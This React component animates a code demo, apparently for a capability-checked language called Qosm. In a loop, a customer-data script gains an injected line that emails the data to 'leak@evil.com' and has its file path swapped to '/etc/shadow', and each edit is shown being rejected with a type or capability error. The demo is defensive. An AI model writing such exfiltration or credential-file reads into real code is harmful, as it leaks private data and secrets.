"use client";

import { useCallback, useEffect, useRef, useState } from "react";

// ── Code content ──────────────────────────────────────────────────────
// More involved data-processing example with customer records.

const BASE_LINES = [
  `let analyze_revenue _ =`,
  `  let data = read_file {path: "/data/customers.json"};`,
  `  let parsed = parse_json @Array<{customer_id: Int, revenue: Float}> data;`,
  `  match parsed with (`,
  `  | Ok rows ->`,
  `      let summary =`,
  `        rows |> group_by .customer_id`,
  `             |> map (compute_avg >> to_string)`,
  `             |> concat in`,
  `      post_msg {channel: "#analytics", text: summary}`,
  `  | Err e -> post_msg {channel: "#analytics", text: "Parse failed"});`,
];

// Injected exfiltration line (typed after the post_msg line)
const INJECT_LINE = `      send_email {dest: "leak@evil.com", subject: "weekly report :)", body: data}`;

// Path substitution
const GOOD_PATH = `/data/customers.json`;
const BAD_PATH = `/etc/shadow`;

// ── Timing ────────────────────────────────────────────────────────────

const CHAR_DELAY = 30;
const ERASE_DELAY = 14;
const PAUSE_IDLE = 3500;
const PAUSE_ERROR = 2800;
const PAUSE_BETWEEN = 1500;

// ── Phases ────────────────────────────────────────────────────────────

type Phase =
  | "idle"
  | "typing_inject"
  | "show_inject"
  | "erasing_inject"
  | "pause_after_inject"
  | "typing_path"
  | "show_path"
  | "erasing_path"
  | "pause_after_path";

type Status = "ok" | "error_inject" | "error_path";

// Index of the post_msg line (0-based) where injection happens after
const INJECT_AFTER_LINE = 9;
// Index of the read_file line where path lives
const PATH_LINE = 1;

// ── Build the displayed code string ───────────────────────────────────

function buildLines(
  injectChars: number,
  pathOverride: string | null,
): string[] {
  const lines = [...BASE_LINES];

  if (pathOverride !== null) {
    lines[PATH_LINE] = `  let data = read_file {path: "${pathOverride}"};`;
  }

  if (injectChars > 0) {
    // Add semicolon to post_msg line
    lines[INJECT_AFTER_LINE] = BASE_LINES[INJECT_AFTER_LINE] + ";";
    const typed = INJECT_LINE.slice(0, injectChars);
    lines.splice(INJECT_AFTER_LINE + 1, 0, typed);
  }

  return lines;
}

// ── Highlight line indices ────────────────────────────────────────────
// Returns set of 0-based line indices that should be highlighted red.

function getHighlightedLines(
  phase: Phase,
  injectChars: number,
): Set<number> {
  const s = new Set<number>();
  // During inject typing or error: highlight the injected line
  if (
    (phase === "typing_inject" || phase === "show_inject" ||
      phase === "erasing_inject") &&
    injectChars > 0
  ) {
    s.add(INJECT_AFTER_LINE + 1); // the spliced-in line
  }
  // During path typing or error: highlight the read_file line
  if (
    phase === "typing_path" ||
    phase === "show_path" ||
    phase === "erasing_path"
  ) {
    s.add(PATH_LINE);
  }
  return s;
}

// ── Syntax highlighting (inline, no QosmCode dependency) ──────────────
// Minimal highlighter that matches QosmCode's hljs rules closely enough.

function highlightLine(line: string): string {
  // Order matters: longer/more specific patterns first.
  // We tokenize by scanning left-to-right and matching patterns.
  const tokens: { start: number; end: number; cls: string }[] = [];

  const patterns: [RegExp, string][] = [
    [/\/\/.*$/gm, "hljs-comment"],
    [/`[^`]*`/g, "hljs-string"],
    [/"""[\s\S]*?"""/g, "hljs-string"],
    [/"(?:[^"\\]|\\.)*"/g, "hljs-string"],
    [/\b\d+\.\d+\b/g, "hljs-number"],
    [/\b\d+\b/g, "hljs-number"],
    [/[λ]/g, "hljs-keyword"],
    [/\b(?:let|in|match|with|type|effect|extern|lambda|rec|model)\b/g, "hljs-keyword"],
    [/\b(?:true|false)\b/g, "hljs-literal"],
    [/\b(?:Int|String|Bool|Float|Unit)\b/g, "hljs-type"],
    [/\b[A-Z][a-zA-Z0-9_]*\b/g, "hljs-title_class"],
    [/\.[a-z][a-zA-Z0-9_]*/g, "hljs-property"],
    [/->|=>|\|>|>>|<<|==|!=|\+\+|\+|-|\*|\/|=|\||!/g, "hljs-operator"],
  ];

  // Collect all matches
  for (const [re, cls] of patterns) {
    re.lastIndex = 0;
    let m: RegExpExecArray | null;
    while ((m = re.exec(line)) !== null) {
      tokens.push({ start: m.index, end: m.index + m[0].length, cls });
    }
  }

  // Sort by start position; remove overlaps (earlier/longer wins)
  tokens.sort((a, b) => a.start - b.start || b.end - a.end);
  const filtered: typeof tokens = [];
  let lastEnd = 0;
  for (const t of tokens) {
    if (t.start >= lastEnd) {
      filtered.push(t);
      lastEnd = t.end;
    }
  }

  // Build HTML
  let result = "";
  let pos = 0;
  for (const t of filtered) {
    if (t.start > pos) {
      result += escapeHtml(line.slice(pos, t.start));
    }
    result += `<span class="${t.cls}">${escapeHtml(line.slice(t.start, t.end))}</span>`;
    pos = t.end;
  }
  if (pos < line.length) {
    result += escapeHtml(line.slice(pos));
  }
  return result;
}

function escapeHtml(s: string): string {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// ── StatusBar ─────────────────────────────────────────────────────────

function StatusBar({ status }: { status: Status }) {
  if (status === "error_inject") {
    return (
      <div className="flex items-center gap-2 px-5 py-2.5 border-t border-border bg-bg-elevated">
        <span className="w-2 h-2 rounded-full bg-red-500 shrink-0" />
        <span className="font-mono text-xs font-semibold text-red-400">
          TYPE ERROR
        </span>
        <span className="font-mono text-[11px] text-text-muted">
          send_email is not a declared capability
        </span>
      </div>
    );
  }
  if (status === "error_path") {
    return (
      <div className="flex items-center gap-2 px-5 py-2.5 border-t border-border bg-bg-elevated">
        <span className="w-2 h-2 rounded-full bg-red-500 shrink-0" />
        <span className="font-mono text-xs font-semibold text-red-400">
          CAPABILITY ERROR
        </span>
        <span className="font-mono text-[11px] text-text-muted">
          path not in /data/*
        </span>
      </div>
    );
  }
  return (
    <div className="flex items-center gap-2 px-5 py-2.5 border-t border-border bg-bg-elevated">
      <span className="w-2 h-2 rounded-full bg-emerald-500 shrink-0" />
      <span className="font-mono text-[11px] text-text-muted">OK!</span>
    </div>
  );
}

// ── Main component ────────────────────────────────────────────────────

export default function CodeAnimation() {
  const [phase, setPhase] = useState<Phase>("idle");
  const [injectChars, setInjectChars] = useState(0);
  const [currentPath, setCurrentPath] = useState<string | null>(null);
  const [pathProgress, setPathProgress] = useState(0);
  const intervalRef = useRef<ReturnType<typeof setInterval> | null>(null);

  const clearTimer = useCallback(() => {
    if (intervalRef.current) {
      clearInterval(intervalRef.current);
      intervalRef.current = null;
    }
  }, []);

  // Phase transitions (timeouts)
  useEffect(() => {
    let timer: ReturnType<typeof setTimeout>;

    switch (phase) {
      case "idle":
        timer = setTimeout(() => setPhase("typing_inject"), PAUSE_IDLE);
        break;
      case "show_inject":
        timer = setTimeout(() => setPhase("erasing_inject"), PAUSE_ERROR);
        break;
      case "pause_after_inject":
        timer = setTimeout(() => setPhase("typing_path"), PAUSE_BETWEEN);
        break;
      case "show_path":
        timer = setTimeout(() => setPhase("erasing_path"), PAUSE_ERROR);
        break;
      case "pause_after_path":
        timer = setTimeout(() => setPhase("idle"), PAUSE_BETWEEN);
        break;
    }

    return () => clearTimeout(timer!);
  }, [phase]);

  // Typing/erasing animations (intervals)
  useEffect(() => {
    clearTimer();

    if (phase === "typing_inject") {
      setInjectChars(0);
      intervalRef.current = setInterval(() => {
        setInjectChars((prev) => {
          const next = prev + 1;
          if (next >= INJECT_LINE.length) {
            clearTimer();
            setTimeout(() => setPhase("show_inject"), CHAR_DELAY);
            return INJECT_LINE.length;
          }
          return next;
        });
      }, CHAR_DELAY);
    }

    if (phase === "erasing_inject") {
      intervalRef.current = setInterval(() => {
        setInjectChars((prev) => {
          const next = prev - 1;
          if (next <= 0) {
            clearTimer();
            setTimeout(() => setPhase("pause_after_inject"), ERASE_DELAY);
            return 0;
          }
          return next;
        });
      }, ERASE_DELAY);
    }

    if (phase === "typing_path") {
      setPathProgress(0);
      setCurrentPath(GOOD_PATH);
      intervalRef.current = setInterval(() => {
        setPathProgress((prev) => {
          const next = prev + 1;
          const eraseEnd = GOOD_PATH.length;
          const totalEnd = eraseEnd + BAD_PATH.length;

          if (next <= eraseEnd) {
            setCurrentPath(GOOD_PATH.slice(0, GOOD_PATH.length - next));
          } else if (next <= totalEnd) {
            setCurrentPath(BAD_PATH.slice(0, next - eraseEnd));
          }

          if (next >= totalEnd) {
            clearTimer();
            setTimeout(() => setPhase("show_path"), CHAR_DELAY);
            return totalEnd;
          }
          return next;
        });
      }, CHAR_DELAY);
    }

    if (phase === "erasing_path") {
      setPathProgress(0);
      setCurrentPath(BAD_PATH);
      intervalRef.current = setInterval(() => {
        setPathProgress((prev) => {
          const next = prev + 1;
          const eraseEnd = BAD_PATH.length;
          const totalEnd = eraseEnd + GOOD_PATH.length;

          if (next <= eraseEnd) {
            setCurrentPath(BAD_PATH.slice(0, BAD_PATH.length - next));
          } else if (next <= totalEnd) {
            setCurrentPath(GOOD_PATH.slice(0, next - eraseEnd));
          }

          if (next >= totalEnd) {
            clearTimer();
            setCurrentPath(null);
            setTimeout(() => setPhase("pause_after_path"), ERASE_DELAY);
            return totalEnd;
          }
          return next;
        });
      }, ERASE_DELAY);
    }

    return clearTimer;
  }, [phase, clearTimer]);

  // Build lines and determine highlights
  const lines = buildLines(injectChars, currentPath);
  const highlighted = getHighlightedLines(phase, injectChars);

  let status: Status = "ok";
  if (phase === "show_inject") status = "error_inject";
  if (phase === "show_path") status = "error_path";

  // Fixed height: max lines is BASE_LINES.length + 1 (inject line).
  // Each line = 1.75em (leading-relaxed), plus pt-3 (0.75rem) + pb-4 (1rem) padding.
  const maxLines = BASE_LINES.length + 1;

  return (
    <div>
      <div className="bg-bg-elevated relative">
        <pre
          className="m-0 px-5 pt-3 pb-4 text-[13px] leading-relaxed overflow-x-auto overflow-y-hidden max-md:text-sm max-md:px-4"
          style={{ height: `calc(${maxLines} * 1.75em + 0.75rem + 1rem)` }}
        >
          <code className="hljs language-qosm font-mono">
            {lines.map((line, i) => {
              const isHighlighted = highlighted.has(i);
              return (
                <div
                  key={i}
                  className={`transition-colors duration-150 -mx-5 px-5 max-md:-mx-4 max-md:px-4 ${
                    isHighlighted
                      ? "bg-red-500/10 border-l-2 border-red-500/60"
                      : "border-l-2 border-transparent"
                  }`}
                  dangerouslySetInnerHTML={{
                    __html: highlightLine(line) || "&nbsp;",
                  }}
                />
              );
            })}
          </code>
        </pre>
      </div>
      <StatusBar status={status} />
    </div>
  );
}
